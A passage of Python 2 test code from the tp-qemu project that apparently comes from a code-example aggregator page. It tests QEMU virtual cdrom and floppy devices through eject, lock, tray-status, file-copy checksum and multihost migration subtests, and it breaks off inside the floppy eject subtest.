        iso_image = iso_image_orig
        for i in range(1, max_times):
            session.cmd(params["eject_cdrom_cmd"] % guest_cdrom_device)
            vm.eject_cdrom(qemu_cdrom_device)
            time.sleep(2)
            if get_cdrom_file(vm, qemu_cdrom_device) is not None:
                raise error.TestFail("Device %s was not ejected"
                                     " (round %s)" % (iso_image, i))

            iso_image = iso_image_new
            # On even attempts, try to change the iso image
            if i % 2 == 0:
                iso_image = iso_image_orig
            vm.change_media(qemu_cdrom_device, iso_image)
            if get_cdrom_file(vm, qemu_cdrom_device) != iso_image:
                raise error.TestFail("Could not change iso image %s"
                                     " (round %s)" % (iso_image, i))
            time.sleep(workaround_eject_time)

    def check_tray_status_test(vm, qemu_cdrom_device, guest_cdrom_device,
                               max_times, iso_image_new):
        """
        Test cdrom tray status reporting function.
        """
        error.context("Change cdrom media via monitor", logging.info)
        iso_image_orig = get_cdrom_file(vm, qemu_cdrom_device)
        if not iso_image_orig:
            raise error.TestError("no media in cdrom")
        vm.change_media(qemu_cdrom_device, iso_image_new)
        is_opened = is_tray_opened(vm, qemu_cdrom_device)
        if is_opened:
            raise error.TestFail("cdrom tray not opened after change media")
        try:
            error.context("Copy test script to guest")
            tray_check_src = params.get("tray_check_src")
            if tray_check_src:
                tray_check_src = os.path.join(data_dir.get_deps_dir(), "cdrom",
                                              tray_check_src)
                vm.copy_files_to(tray_check_src, params["tmp_dir"])

            if is_tray_opened(vm, qemu_cdrom_device) is None:
                logging.warn("Tray status reporting is not supported by qemu!")
                logging.warn("cdrom_test_tray_status test is skipped...")
                return

            error.context("Eject the cdrom in guest %s times" % max_times,
                          logging.info)
            session = vm.wait_for_login(timeout=login_timeout)
            for i in range(1, max_times):
                session.cmd(params["eject_cdrom_cmd"] % guest_cdrom_device)
                if not is_tray_opened(vm, qemu_cdrom_device):
                    raise error.TestFail("Monitor reports tray closed"
                                         " when ejecting (round %s)" % i)
                if params["os_type"] != "windows":
                    cmd = "dd if=%s of=/dev/null count=1" % guest_cdrom_device
                else:
                    # windows guest does not support auto close door when reading
                    # cdrom, so close it by eject command;
                    cmd = params["close_cdrom_cmd"] % guest_cdrom_device
                session.cmd(cmd)
                if is_tray_opened(vm, qemu_cdrom_device):
                    raise error.TestFail("Monitor reports tray opened when close"
                                         " cdrom in guest (round %s)" % i)
                time.sleep(workaround_eject_time)
        finally:
            vm.change_media(qemu_cdrom_device, iso_image_orig)

    def check_tray_locked_test(vm, qemu_cdrom_device, guest_cdrom_device):
        """
        Test cdrom tray locked function.
        """
        error.context("Check cdrom tray status after cdrom is locked",
                      logging.info)
        session = vm.wait_for_login(timeout=login_timeout)
        tmp_is_trap_open = is_tray_opened(vm, qemu_cdrom_device, mode='mixed',
                                          dev_name=guest_cdrom_device)
        if tmp_is_trap_open is None:
            logging.warn("Tray status reporting is not supported by qemu!")
            logging.warn("cdrom_test_locked test is skipped...")
            return

        eject_failed = False
        eject_failed_msg = "Tray should be closed even in locked status"
        session.cmd(params["eject_cdrom_cmd"] % guest_cdrom_device)
        tmp_is_trap_open = is_tray_opened(vm, qemu_cdrom_device, mode='mixed',
                                          dev_name=guest_cdrom_device)
        if not tmp_is_trap_open:
            raise error.TestFail("Tray should not in closed status")
        session.cmd(params["lock_cdrom_cmd"] % guest_cdrom_device)
        try:
            session.cmd(params["close_cdrom_cmd"] % guest_cdrom_device)
        except aexpect.ShellCmdError, e:
            eject_failed = True
            eject_failed_msg += ", eject command failed: %s" % str(e)

        tmp_is_trap_open = is_tray_opened(vm, qemu_cdrom_device, mode='mixed',
                                          dev_name=guest_cdrom_device)
        if (eject_failed or tmp_is_trap_open):
            raise error.TestFail(eject_failed_msg)
        session.cmd(params["unlock_cdrom_cmd"] % guest_cdrom_device)
        session.cmd(params["close_cdrom_cmd"] % guest_cdrom_device)

    def file_operation_test(session, guest_cdrom_device, max_times):
        """
        Cdrom file operation test.
        """
        filename = "new"
        mount_point = get_cdrom_mount_point(session,
                                            guest_cdrom_device, params)
        mount_cmd = params["mount_cdrom_cmd"] % (guest_cdrom_device,
                                                 mount_point)
        umount_cmd = params["umount_cdrom_cmd"] % guest_cdrom_device
        src_file = params["src_file"] % (mount_point, filename)
        dst_file = params["dst_file"] % filename
        copy_file_cmd = params["copy_file_cmd"] % (mount_point, filename)
        remove_file_cmd = params["remove_file_cmd"] % filename
        show_mount_cmd = params["show_mount_cmd"]
        md5sum_cmd = params["md5sum_cmd"]

        if params["os_type"] != "windows":
            error.context("Mounting the cdrom under %s" % mount_point,
                          logging.info)
            session.cmd(mount_cmd, timeout=30)
        error.context("File copying test", logging.info)
        session.cmd(copy_file_cmd)
        f1_hash = session.cmd(md5sum_cmd % dst_file).split()[0].strip()
        f2_hash = session.cmd(md5sum_cmd % src_file).split()[0].strip()
        if f1_hash != f2_hash:
            raise error.TestFail("On disk and on cdrom files are different, "
                                 "md5 mismatch")
        session.cmd(remove_file_cmd)
        error.context("Mount/Unmount cdrom for %s times" % max_times,
                      logging.info)
        for _ in range(1, max_times):
            try:
                session.cmd(umount_cmd)
                session.cmd(mount_cmd)
            except aexpect.ShellError, detail:
                logging.error("Mount/Unmount fail, detail: '%s'", detail)
                logging.debug(session.cmd(show_mount_cmd))
                raise
        if params["os_type"] != "windows":
            session.cmd("umount %s" % guest_cdrom_device)

    # Test main body start.
    class MiniSubtest(object):

        def __new__(cls, *args, **kargs):
            self = super(MiniSubtest, cls).__new__(cls)
            ret = None
            exc_info = None
            if args is None:
                args = []
            try:
                try:
                    ret = self.test(*args, **kargs)
                except Exception:
                    exc_info = sys.exc_info()
            finally:
                if hasattr(self, "clean"):
                    try:
                        self.clean()
                    except Exception:
                        if exc_info is None:
                            raise
                    if exc_info:
                        raise exc_info[0], exc_info[1], exc_info[2]
            return ret

    class test_singlehost(MiniSubtest):

        def test(self):
            self.iso_image_orig = create_iso_image(params, "orig")
            self.iso_image_new = create_iso_image(params, "new")
            self.cdrom_dir = os.path.dirname(self.iso_image_new)
            if params.get("not_insert_at_start") == "yes":
                target_cdrom = params["target_cdrom"]
                params[target_cdrom] = ""
            params["start_vm"] = "yes"
            serial_num = generate_serial_num()
            cdrom = params.get("cdroms", "").split()[-1]
            params["drive_serial_%s" % cdrom] = serial_num
            env_process.preprocess_vm(test, params, env, params["main_vm"])
            vm = env.get_vm(params["main_vm"])

            self.session = vm.wait_for_login(timeout=login_timeout)
            pre_cmd = params.get("pre_cmd")
            if pre_cmd:
                self.session.cmd(pre_cmd, timeout=120)
                self.session = vm.reboot()
            iso_image = self.iso_image_orig
            error.context("Query cdrom devices in guest")
            cdrom_dev_list = list_guest_cdroms(self.session)
            logging.debug("cdrom_dev_list: '%s'", cdrom_dev_list)

            if params.get('not_insert_at_start') == "yes":
                error.context("Locked without media present", logging.info)
                # XXX: The device got from monitor might not match with the guest
                # defice if there are multiple cdrom devices.
                qemu_cdrom_device = get_empty_cdrom_device(vm)
                guest_cdrom_device = get_testing_cdrom_device(vm,
                                                              self.session,
                                                              cdrom_dev_list,
                                                              serial_num)
                if vm.check_block_locked(qemu_cdrom_device):
                    raise error.TestFail("Device should not be locked just"
                                         " after booting up")
                cmd = params["lock_cdrom_cmd"] % guest_cdrom_device
                self.session.cmd(cmd)
                if not vm.check_block_locked(qemu_cdrom_device):
                    raise error.TestFail("Device is not locked as expect.")
                return

            error.context("Detecting the existence of a cdrom (guest OS side)",
                          logging.info)
            cdrom_dev_list = list_guest_cdroms(self.session)
            guest_cdrom_device = get_testing_cdrom_device(vm,
                                                          self.session,
                                                          cdrom_dev_list,
                                                          serial_num)
            error.context("Detecting the existence of a cdrom (qemu side)",
                          logging.info)
            qemu_cdrom_device = get_device(vm, iso_image)
            if params["os_type"] != "windows":
                self.session.get_command_output("umount %s" % guest_cdrom_device)
            if params.get('cdrom_test_autounlock') == 'yes':
                error.context("Trying to unlock the cdrom", logging.info)
                if not utils_misc.wait_for(lambda: not
                                           vm.check_block_locked(qemu_cdrom_device),
                                           300):
                    raise error.TestFail("Device %s could not be"
                                         " unlocked" % (qemu_cdrom_device))

            max_test_times = int(params.get("cdrom_max_test_times", 100))
            if params.get("cdrom_test_eject") == "yes":
                eject_test_via_monitor(vm, qemu_cdrom_device,
                                       guest_cdrom_device, self.iso_image_orig,
                                       self.iso_image_new, max_test_times)

            if params.get('cdrom_test_tray_status') == 'yes':
                check_tray_status_test(vm, qemu_cdrom_device,
                                       guest_cdrom_device, max_test_times,
                                       self.iso_image_new)

            if params.get('cdrom_test_locked') == 'yes':
                check_tray_locked_test(vm, qemu_cdrom_device,
                                       guest_cdrom_device)

            error.context("Check whether the cdrom is read-only", logging.info)
            cmd = params["readonly_test_cmd"] % guest_cdrom_device
            try:
                self.session.cmd(cmd)
                raise error.TestFail("Attempt to format cdrom %s succeeded" %
                                     (guest_cdrom_device))
            except aexpect.ShellError:
                pass

            sub_test = params.get("sub_test")
            if sub_test:
                error.context("Run sub test '%s' before doing file"
                              " operation" % sub_test, logging.info)
                utils_test.run_virt_sub_test(test, params, env, sub_test)

            if params.get("cdrom_test_file_operation") == "yes":
                file_operation_test(self.session, guest_cdrom_device,
                                    max_test_times)

            error.context("Cleanup")
            # Return the self.iso_image_orig
            cdfile = get_cdrom_file(vm, qemu_cdrom_device)
            if cdfile != self.iso_image_orig:
                time.sleep(workaround_eject_time)
                self.session.cmd(params["eject_cdrom_cmd"] %
                                 guest_cdrom_device)
                vm.eject_cdrom(qemu_cdrom_device)
                if get_cdrom_file(vm, qemu_cdrom_device) is not None:
                    raise error.TestFail("Device %s was not ejected"
                                         " in clearup stage" % qemu_cdrom_device)

                vm.change_media(qemu_cdrom_device, self.iso_image_orig)
                if get_cdrom_file(vm, qemu_cdrom_device) != self.iso_image_orig:
                    raise error.TestFail("It wasn't possible to change"
                                         " cdrom %s" % iso_image)
            post_cmd = params.get("post_cmd")
            if post_cmd:
                self.session.cmd(post_cmd)
            if params.get("guest_suspend_type"):
                self.session = vm.reboot()

        def clean(self):
            self.session.close()
            cleanup_cdrom(self.iso_image_orig)
            cleanup_cdrom(self.iso_image_new)

    class Multihost(MiniSubtest):

        def test(self):
            error.context("Preparing migration env and cdroms.", logging.info)
            mig_protocol = params.get("mig_protocol", "tcp")
            self.mig_type = migration.MultihostMigration
            if mig_protocol == "fd":
                self.mig_type = migration.MultihostMigrationFd
            if mig_protocol == "exec":
                self.mig_type = migration.MultihostMigrationExec
            if "rdma" in mig_protocol:
                self.mig_type = migration.MultihostMigrationRdma

            self.vms = params.get("vms").split(" ")
            self.srchost = params.get("hosts")[0]
            self.dsthost = params.get("hosts")[1]
            self.is_src = params.get("hostid") == self.srchost
            self.mig = self.mig_type(test, params, env, False, )
            self.cdrom_size = int(params.get("cdrom_size", 10))
            cdrom = params.objects("cdroms")[-1]
            self.serial_num = params.get("drive_serial_%s" % cdrom)

            if self.is_src:
                self.cdrom_orig = create_iso_image(params, "orig",
                                                   file_size=self.cdrom_size)
                self.cdrom_dir = os.path.dirname(self.cdrom_orig)
                vm = env.get_vm(self.vms[0])
                vm.destroy()
                params["start_vm"] = "yes"
                env_process.process(test, params, env,
                                    env_process.preprocess_image,
                                    env_process.preprocess_vm)
                vm = env.get_vm(self.vms[0])
                vm.wait_for_login(timeout=login_timeout)
            else:
                self.cdrom_orig = create_iso_image(params, "orig", False)
                self.cdrom_dir = os.path.dirname(self.cdrom_orig)

        def clean(self):
            self.mig.cleanup()
            if self.is_src:
                cleanup_cdrom(self.cdrom_orig)

    class test_multihost_locking(Multihost):

        def test(self):
            super(test_multihost_locking, self).test()

            error.context("Lock cdrom in VM.", logging.info)
            # Starts in source
            if self.is_src:
                vm = env.get_vm(params["main_vm"])
                session = vm.wait_for_login(timeout=login_timeout)
                cdrom_dev_list = list_guest_cdroms(session)
                guest_cdrom_device = get_testing_cdrom_device(vm,
                                                              session,
                                                              cdrom_dev_list,
                                                              self.serial_num)
                logging.debug("cdrom_dev_list: %s", cdrom_dev_list)
                device = get_device(vm, self.cdrom_orig)

                session.cmd(params["lock_cdrom_cmd"] % guest_cdrom_device)
                locked = check_cdrom_lock(vm, device)
                if locked:
                    logging.debug("Cdrom device is successfully locked in VM.")
                else:
                    raise error.TestFail("Cdrom device should be locked"
                                         " in VM.")

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'cdrom_dev', cdrom_prepare_timeout)

            self.mig.migrate_wait([self.vms[0]], self.srchost, self.dsthost)

            # Starts in dest
            if not self.is_src:
                vm = env.get_vm(params["main_vm"])
                session = vm.wait_for_login(timeout=login_timeout)
                cdrom_dev_list = list_guest_cdroms(session)
                logging.debug("cdrom_dev_list: %s", cdrom_dev_list)
                device = get_device(vm, self.cdrom_orig)

                locked = check_cdrom_lock(vm, device)
                if locked:
                    logging.debug("Cdrom device stayed locked after "
                                  "migration in VM.")
                else:
                    raise error.TestFail("Cdrom device should stayed locked"
                                         " after migration in VM.")

                error.context("Unlock cdrom from VM.", logging.info)
                cdrom_dev_list = list_guest_cdroms(session)
                guest_cdrom_device = get_testing_cdrom_device(vm,
                                                              session,
                                                              cdrom_dev_list,
                                                              self.serial_num)
                session.cmd(params["unlock_cdrom_cmd"] % guest_cdrom_device)
                locked = check_cdrom_lock(vm, device)
                if not locked:
                    logging.debug("Cdrom device is successfully unlocked"
                                  " from VM.")
                else:
                    raise error.TestFail("Cdrom device should be unlocked"
                                         " in VM.")

            self.mig.migrate_wait([self.vms[0]], self.dsthost, self.srchost)

            if self.is_src:
                vm = env.get_vm(params["main_vm"])
                locked = check_cdrom_lock(vm, device)
                if not locked:
                    logging.debug("Cdrom device stayed unlocked after "
                                  "migration in VM.")
                else:
                    raise error.TestFail("Cdrom device should stayed unlocked"
                                         " after migration in VM.")

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'Finish_cdrom_test', login_timeout)

        def clean(self):
            super(test_multihost_locking, self).clean()

    class test_multihost_ejecting(Multihost):

        def test(self):
            super(test_multihost_ejecting, self).test()

            self.cdrom_new = create_iso_image(params, "new")

            if not self.is_src:
                self.cdrom_new = create_iso_image(params, "new", False)
                self.cdrom_dir = os.path.dirname(self.cdrom_new)
                params["cdrom_cd1"] = params.get("cdrom_cd1_host2")

            if self.is_src:
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)
                cdrom_dev_list = list_guest_cdroms(session)
                logging.debug("cdrom_dev_list: %s", cdrom_dev_list)
                device = get_device(vm, self.cdrom_orig)
                cdrom = get_testing_cdrom_device(vm,
                                                 session,
                                                 cdrom_dev_list,
                                                 self.serial_num)

                error.context("Eject cdrom.", logging.info)
                session.cmd(params["eject_cdrom_cmd"] % cdrom)
                vm.eject_cdrom(device)
                time.sleep(2)
                if get_cdrom_file(vm, device) is not None:
                    raise error.TestFail("Device %s was not ejected" % (cdrom))

                cdrom = self.cdrom_new

                error.context("Change cdrom.", logging.info)
                vm.change_media(device, cdrom)
                if get_cdrom_file(vm, device) != cdrom:
                    raise error.TestFail("It wasn't possible to change "
                                         "cdrom %s" % (cdrom))
                time.sleep(workaround_eject_time)

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'cdrom_dev', cdrom_prepare_timeout)

            self.mig.migrate_wait([self.vms[0]], self.srchost, self.dsthost)

            if not self.is_src:
                vm = env.get_vm(self.vms[0])
                vm.reboot()

        def clean(self):
            if self.is_src:
                cleanup_cdrom(self.cdrom_new)
            super(test_multihost_ejecting, self).clean()

    class test_multihost_copy(Multihost):

        def test(self):
            super(test_multihost_copy, self).test()
            copy_timeout = int(params.get("copy_timeout", 480))
            checksum_timeout = int(params.get("checksum_timeout", 180))

            pid = None
            sync_id = {'src': self.srchost,
                       'dst': self.dsthost,
                       "type": "file_trasfer"}
            filename = "orig"
            remove_file_cmd = params["remove_file_cmd"] % filename
            dst_file = params["dst_file"] % filename

            if self.is_src:  # Starts in source
                vm = env.get_vm(self.vms[0])
                vm.monitor.migrate_set_speed("1G")
                session = vm.wait_for_login(timeout=login_timeout)
                cdrom_dev_list = list_guest_cdroms(session)
                logging.debug("cdrom_dev_list: %s", cdrom_dev_list)
                cdrom = get_testing_cdrom_device(vm,
                                                 session,
                                                 cdrom_dev_list,
                                                 self.serial_num)
                mount_point = get_cdrom_mount_point(session, cdrom, params)
                mount_cmd = params["mount_cdrom_cmd"] % (cdrom, mount_point)
                src_file = params["src_file"] % (mount_point, filename)
                copy_file_cmd = params[
                    "copy_file_cmd"] % (mount_point, filename)
                if params["os_type"] != "windows":
                    error.context("Mount and copy data", logging.info)
                    session.cmd(mount_cmd, timeout=30)

                error.context("File copying test", logging.info)
                session.cmd(remove_file_cmd)
                session.cmd(copy_file_cmd)

                pid = disk_copy(vm, src_file, dst_file, copy_timeout)

            sync = SyncData(self.mig.master_id(), self.mig.hostid,
                            self.mig.hosts, sync_id, self.mig.sync_server)

            pid = sync.sync(pid, timeout=cdrom_prepare_timeout)[self.srchost]

            self.mig.migrate_wait([self.vms[0]], self.srchost, self.dsthost)

            if not self.is_src:  # Starts in source
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)
                error.context("Wait for copy finishing.", logging.info)
                cdrom_dev_list = list_guest_cdroms(session)
                cdrom = get_testing_cdrom_device(vm,
                                                 session,
                                                 cdrom_dev_list,
                                                 self.serial_num)
                mount_point = get_cdrom_mount_point(session, cdrom, params)
                mount_cmd = params["mount_cdrom_cmd"] % (cdrom, mount_point)
                src_file = params["src_file"] % (mount_point, filename)
                md5sum_cmd = params["md5sum_cmd"]

                def is_copy_done():
                    if params["os_type"] == "windows":
                        cmd = "tasklist /FI \"PID eq %s\"" % pid
                    else:
                        cmd = "ps -p %s" % pid
                    return session.cmd_status(cmd) != 0

                if not utils_misc.wait_for(is_copy_done, timeout=copy_timeout):
                    raise error.TestFail("Wait for file copy finish timeout")

                error.context("Compare file on disk and on cdrom", logging.info)
                f1_hash = session.cmd(md5sum_cmd % dst_file,
                                      timeout=checksum_timeout).split()[0]
                f2_hash = session.cmd(md5sum_cmd % src_file,
                                      timeout=checksum_timeout).split()[0]
                if f1_hash.strip() != f2_hash.strip():
                    raise error.TestFail("On disk and on cdrom files are"
                                         " different, md5 mismatch")
                session.cmd(remove_file_cmd)

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'Finish_cdrom_test', login_timeout)

        def clean(self):
            super(test_multihost_copy, self).clean()

    test_type = params.get("test_type", "test_singlehost")
    if (test_type in locals()):
        tests_group = locals()[test_type]
        tests_group()
    else:
        raise error.TestFail("Test group '%s' is not defined in"
                             " migration_with_dst_problem test" % test_type)

Example 8

Project: tp-qemu
Source File: floppy.py
View license
@error.context_aware
def run(test, params, env):
    """
    Test virtual floppy of guest:

    1) Create a floppy disk image on host
    2) Start the guest with this floppy image.
    3) Make a file system on guest virtual floppy.
    4) Calculate md5sum value of a file and copy it into floppy.
    5) Verify whether the md5sum does match.

    :param test: QEMU test object.
    :param params: Dictionary with the test parameters.
    :param env: Dictionary with test environment.
    """
    source_file = params["source_file"]
    dest_file = params["dest_file"]
    login_timeout = int(params.get("login_timeout", 360))
    floppy_prepare_timeout = int(params.get("floppy_prepare_timeout", 360))
    guest_floppy_path = params["guest_floppy_path"]

    def create_floppy(params, prepare=True):
        """
        Creates 'new' floppy with one file on it

        :param params: parameters for test
        :param preapre: if True then it prepare cd images.

        :return: path to new floppy file.
        """
        error.context("creating test floppy", logging.info)
        floppy = params["floppy_name"]
        if not os.path.isabs(floppy):
            floppy = os.path.join(data_dir.get_data_dir(), floppy)
        if prepare:
            utils.run("dd if=/dev/zero of=%s bs=512 count=2880" % floppy)
        return floppy

    def cleanup_floppy(path):
        """ Removes created floppy """
        error.context("cleaning up temp floppy images", logging.info)
        os.remove("%s" % path)

    def lazy_copy(vm, dst_path, check_path, copy_timeout=None, dsize=None):
        """
        Start disk load. Cyclic copy from src_path to dst_path.

        :param vm: VM where to find a disk.
        :param src_path: Source of data
        :param copy_timeout: Timeout for copy
        :param dsize: Size of data block which is periodically copied.
        """
        if copy_timeout is None:
            copy_timeout = 120
        session = vm.wait_for_login(timeout=login_timeout)
        cmd = ('nohup bash -c "while [ true ]; do echo \"1\" | '
               'tee -a %s >> %s; sleep 0.1; done" 2> /dev/null &' %
               (check_path, dst_path))
        pid = re.search(r"\[.+\] (.+)",
                        session.cmd_output(cmd, timeout=copy_timeout))
        return pid.group(1)

    class MiniSubtest(object):

        def __new__(cls, *args, **kargs):
            self = super(MiniSubtest, cls).__new__(cls)
            ret = None
            exc_info = None
            if args is None:
                args = []
            try:
                try:
                    ret = self.test(*args, **kargs)
                except Exception:
                    exc_info = sys.exc_info()
            finally:
                if hasattr(self, "clean"):
                    try:
                        self.clean()
                    except Exception:
                        if exc_info is None:
                            raise
                    if exc_info:
                        raise exc_info[0], exc_info[1], exc_info[2]
            return ret

    class test_singlehost(MiniSubtest):

        def test(self):
            create_floppy(params)
            params["start_vm"] = "yes"
            vm_name = params.get("main_vm", "vm1")
            env_process.preprocess_vm(test, params, env, vm_name)
            vm = env.get_vm(vm_name)
            vm.verify_alive()
            self.session = vm.wait_for_login(timeout=login_timeout)

            self.dest_dir = params.get("mount_dir")
            # If mount_dir specified, treat guest as a Linux OS
            # Some Linux distribution does not load floppy at boot and Windows
            # needs time to load and init floppy driver
            if self.dest_dir:
                lsmod = self.session.cmd("lsmod")
                if 'floppy' not in lsmod:
                    self.session.cmd("modprobe floppy")
            else:
                time.sleep(20)

            error.context("Formating floppy disk before using it")
            format_cmd = params["format_floppy_cmd"]
            self.session.cmd(format_cmd, timeout=120)
            logging.info("Floppy disk formatted successfully")

            if self.dest_dir:
                error.context("Mounting floppy")
                self.session.cmd("mount %s %s" % (guest_floppy_path,
                                                  self.dest_dir))
            error.context("Testing floppy")
            self.session.cmd(params["test_floppy_cmd"])

            error.context("Copying file to the floppy")
            md5_cmd = params.get("md5_cmd")
            if md5_cmd:
                md5_source = self.session.cmd("%s %s" % (md5_cmd, source_file))
                try:
                    md5_source = md5_source.split(" ")[0]
                except IndexError:
                    error.TestError("Failed to get md5 from source file,"
                                    " output: '%s'" % md5_source)
            else:
                md5_source = None

            self.session.cmd("%s %s %s" % (params["copy_cmd"], source_file,
                                           dest_file))
            logging.info("Succeed to copy file '%s' into floppy disk" %
                         source_file)

            error.context("Checking if the file is unchanged after copy")
            if md5_cmd:
                md5_dest = self.session.cmd("%s %s" % (md5_cmd, dest_file))
                try:
                    md5_dest = md5_dest.split(" ")[0]
                except IndexError:
                    error.TestError("Failed to get md5 from dest file,"
                                    " output: '%s'" % md5_dest)
                if md5_source != md5_dest:
                    raise error.TestFail("File changed after copy to floppy")
            else:
                md5_dest = None
                self.session.cmd("%s %s %s" % (params["diff_file_cmd"],
                                               source_file, dest_file))

        def clean(self):
            clean_cmd = "%s %s" % (params["clean_cmd"], dest_file)
            self.session.cmd(clean_cmd)
            if self.dest_dir:
                self.session.cmd("umount %s" % self.dest_dir)
            self.session.close()

    class Multihost(MiniSubtest):

        def test(self):
            error.context("Preparing migration env and floppies.", logging.info)
            mig_protocol = params.get("mig_protocol", "tcp")
            self.mig_type = migration.MultihostMigration
            if mig_protocol == "fd":
                self.mig_type = migration.MultihostMigrationFd
            if mig_protocol == "exec":
                self.mig_type = migration.MultihostMigrationExec
            if "rdma" in mig_protocol:
                self.mig_type = migration.MultihostMigrationRdma

            self.vms = params.get("vms").split(" ")
            self.srchost = params["hosts"][0]
            self.dsthost = params["hosts"][1]
            self.is_src = params["hostid"] == self.srchost
            self.mig = self.mig_type(test, params, env, False, )

            if self.is_src:
                vm = env.get_vm(self.vms[0])
                vm.destroy()
                self.floppy = create_floppy(params)
                self.floppy_dir = os.path.dirname(self.floppy)
                params["start_vm"] = "yes"
                env_process.process(test, params, env,
                                    env_process.preprocess_image,
                                    env_process.preprocess_vm)
                vm = env.get_vm(self.vms[0])
                vm.wait_for_login(timeout=login_timeout)
            else:
                self.floppy = create_floppy(params, False)
                self.floppy_dir = os.path.dirname(self.floppy)

        def clean(self):
            self.mig.cleanup()
            if self.is_src:
                cleanup_floppy(self.floppy)

    class test_multihost_write(Multihost):

        def test(self):
            super(test_multihost_write, self).test()

            copy_timeout = int(params.get("copy_timeout", 480))
            self.mount_dir = params["mount_dir"]
            format_floppy_cmd = params["format_floppy_cmd"]
            check_copy_path = params["check_copy_path"]

            pid = None
            sync_id = {'src': self.srchost,
                       'dst': self.dsthost,
                       "type": "file_trasfer"}
            filename = "orig"
            src_file = os.path.join(self.mount_dir, filename)

            if self.is_src:  # Starts in source
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)

                if self.mount_dir:
                    session.cmd("rm -f %s" % (src_file))
                    session.cmd("rm -f %s" % (check_copy_path))
                # If mount_dir specified, treat guest as a Linux OS
                # Some Linux distribution does not load floppy at boot
                # and Windows needs time to load and init floppy driver
                error.context("Prepare floppy for writing.", logging.info)
                if self.mount_dir:
                    lsmod = session.cmd("lsmod")
                    if 'floppy' not in lsmod:
                        session.cmd("modprobe floppy")
                else:
                    time.sleep(20)

                session.cmd(format_floppy_cmd)

                error.context("Mount and copy data.", logging.info)
                if self.mount_dir:
                    session.cmd("mount %s %s" % (guest_floppy_path,
                                                 self.mount_dir),
                                timeout=30)

                error.context("File copying test.", logging.info)

                pid = lazy_copy(vm, src_file, check_copy_path, copy_timeout)

            sync = SyncData(self.mig.master_id(), self.mig.hostid,
                            self.mig.hosts, sync_id, self.mig.sync_server)

            pid = sync.sync(pid, timeout=floppy_prepare_timeout)[self.srchost]

            self.mig.migrate_wait([self.vms[0]], self.srchost, self.dsthost)

            if not self.is_src:  # Starts in destination
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)
                error.context("Wait for copy finishing.", logging.info)
                status = session.cmd_status("kill %s" % pid,
                                            timeout=copy_timeout)
                if status != 0:
                    raise error.TestFail("Copy process was terminatted with"
                                         " error code %s" % (status))

                session.cmd_status("kill -s SIGINT %s" % (pid),
                                   timeout=copy_timeout)

                error.context("Check floppy file checksum.", logging.info)
                md5_cmd = params.get("md5_cmd", "md5sum")
                if md5_cmd:
                    md5_floppy = session.cmd("%s %s" % (md5_cmd, src_file))
                    try:
                        md5_floppy = md5_floppy.split(" ")[0]
                    except IndexError:
                        error.TestError("Failed to get md5 from source file,"
                                        " output: '%s'" % md5_floppy)
                    md5_check = session.cmd("%s %s" % (md5_cmd, check_copy_path))
                    try:
                        md5_check = md5_check.split(" ")[0]
                    except IndexError:
                        error.TestError("Failed to get md5 from dst file,"
                                        " output: '%s'" % md5_floppy)
                    if md5_check != md5_floppy:
                        raise error.TestFail("There is mistake in copying, "
                                             "it is possible to check file on vm.")

                session.cmd("rm -f %s" % (src_file))
                session.cmd("rm -f %s" % (check_copy_path))

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'finish_floppy_test', login_timeout)

        def clean(self):
            super(test_multihost_write, self).clean()

    class test_multihost_eject(Multihost):

        def test(self):
            super(test_multihost_eject, self).test()

            self.mount_dir = params.get("mount_dir", None)
            format_floppy_cmd = params["format_floppy_cmd"]
            floppy = params["floppy_name"]
            second_floppy = params["second_floppy_name"]
            if not os.path.isabs(floppy):
                floppy = os.path.join(data_dir.get_data_dir(), floppy)
            if not os.path.isabs(second_floppy):
                second_floppy = os.path.join(data_dir.get_data_dir(),
                                             second_floppy)
            if not self.is_src:
                self.floppy = create_floppy(params)

            pid = None
            sync_id = {'src': self.srchost,
                       'dst': self.dsthost,
                       "type": "file_trasfer"}
            filename = "orig"
            src_file = os.path.join(self.mount_dir, filename)

            if self.is_src:  # Starts in source
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)

                if self.mount_dir:   # If linux
                    session.cmd("rm -f %s" % (src_file))
                # If mount_dir specified, treat guest as a Linux OS
                # Some Linux distribution does not load floppy at boot
                # and Windows needs time to load and init floppy driver
                error.context("Prepare floppy for writing.", logging.info)
                if self.mount_dir:   # If linux
                    lsmod = session.cmd("lsmod")
                    if 'floppy' not in lsmod:
                        session.cmd("modprobe floppy")
                else:
                    time.sleep(20)

                if floppy not in vm.monitor.info("block"):
                    raise error.TestFail("Wrong floppy image is placed in vm.")

                try:
                    session.cmd(format_floppy_cmd)
                except aexpect.ShellCmdError, e:
                    if e.status == 1:
                        logging.error("First access to floppy failed, "
                                      " Trying a second time as a workaround")
                        session.cmd(format_floppy_cmd)

                error.context("Check floppy")
                if self.mount_dir:   # If linux
                    session.cmd("mount %s %s" % (guest_floppy_path,
                                                 self.mount_dir), timeout=30)
                    session.cmd("umount %s" % (self.mount_dir), timeout=30)

                written = None
                if self.mount_dir:
                    filepath = os.path.join(self.mount_dir, "test.txt")
                    session.cmd("echo 'test' > %s" % (filepath))
                    output = session.cmd("cat %s" % (filepath))
                    written = "test\n"
                else:   # Windows version.
                    filepath = "A:\\test.txt"
                    session.cmd("echo test > %s" % (filepath))
                    output = session.cmd("type %s" % (filepath))
                    written = "test \n\n"
                if output != written:
                    raise error.TestFail("Data read from the floppy differs"
                                         "from the data written to it."
                                         " EXPECTED: %s GOT: %s" %
                                         (repr(written), repr(output)))

                error.context("Change floppy.")
                vm.monitor.cmd("eject floppy0")
                vm.monitor.cmd("change floppy %s" % (second_floppy))
                session.cmd(format_floppy_cmd)

                error.context("Mount and copy data")
                if self.mount_dir:   # If linux
                    session.cmd("mount %s %s" % (guest_floppy_path,
                                                 self.mount_dir), timeout=30)

                if second_floppy not in vm.monitor.info("block"):
                    raise error.TestFail("Wrong floppy image is placed in vm.")

            sync = SyncData(self.mig.master_id(), self.mig.hostid,
                            self.mig.hosts, sync_id, self.mig.sync_server)

